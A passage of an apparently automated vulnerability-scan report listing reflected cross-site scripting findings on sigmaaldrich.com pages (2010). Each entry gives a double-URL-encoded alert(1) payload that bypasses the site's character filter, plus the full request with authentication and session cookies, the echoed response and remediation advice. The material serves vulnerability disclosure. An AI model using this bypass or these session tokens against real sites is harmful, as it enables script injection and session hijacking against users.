ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:18 GMT
Content-Length: 28966
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/fluka-analytical64f3d";alert(1)//484e4ebf13c/customware-oem.html","E404") ;
   </script>
...[SNIP]...

1.14. http://www.sigmaaldrich.com/analytical-chromatography/fluka-analytical/customware-oem.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/fluka-analytical/customware-oem.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6189a%2522%253balert%25281%2529%252f%252f820223a893e was submitted in the REST URL parameter 3. This input was echoed as 6189a";alert(1)//820223a893e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/fluka-analytical/6189a%2522%253balert%25281%2529%252f%252f820223a893e HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:20 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/fluka-analytical/6189a";alert(1)//820223a893e","E404") ;
   </script>
...[SNIP]...

1.15. http://www.sigmaaldrich.com/analytical-chromatography/gas-chromatography.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/gas-chromatography.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d60f3%2522%253balert%25281%2529%252f%252f722fc13639f was submitted in the REST URL parameter 1. This input was echoed as d60f3";alert(1)//722fc13639f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatographyd60f3%2522%253balert%25281%2529%252f%252f722fc13639f/gas-chromatography.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:02 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatographyd60f3";alert(1)//722fc13639f/gas-chromatography.html","E404") ;
   </script>
...[SNIP]...

1.16. http://www.sigmaaldrich.com/analytical-chromatography/gas-chromatography.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/gas-chromatography.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1692%2522%253balert%25281%2529%252f%252f930c055d40c was submitted in the REST URL parameter 2. This input was echoed as e1692";alert(1)//930c055d40c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/e1692%2522%253balert%25281%2529%252f%252f930c055d40c HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:05 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/e1692";alert(1)//930c055d40c","E404") ;
   </script>
...[SNIP]...

1.17. http://www.sigmaaldrich.com/analytical-chromatography/hplc.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/hplc.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27425%2522%253balert%25281%2529%252f%252f263fc626307 was submitted in the REST URL parameter 1. This input was echoed as 27425";alert(1)//263fc626307 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography27425%2522%253balert%25281%2529%252f%252f263fc626307/hplc.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:03 GMT
Content-Length: 28939
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography27425";alert(1)//263fc626307/hplc.html","E404") ;
   </script>
...[SNIP]...

1.18. http://www.sigmaaldrich.com/analytical-chromatography/hplc.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/hplc.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a801%2522%253balert%25281%2529%252f%252f8a6f51f14da was submitted in the REST URL parameter 2. This input was echoed as 2a801";alert(1)//8a6f51f14da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/2a801%2522%253balert%25281%2529%252f%252f8a6f51f14da HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
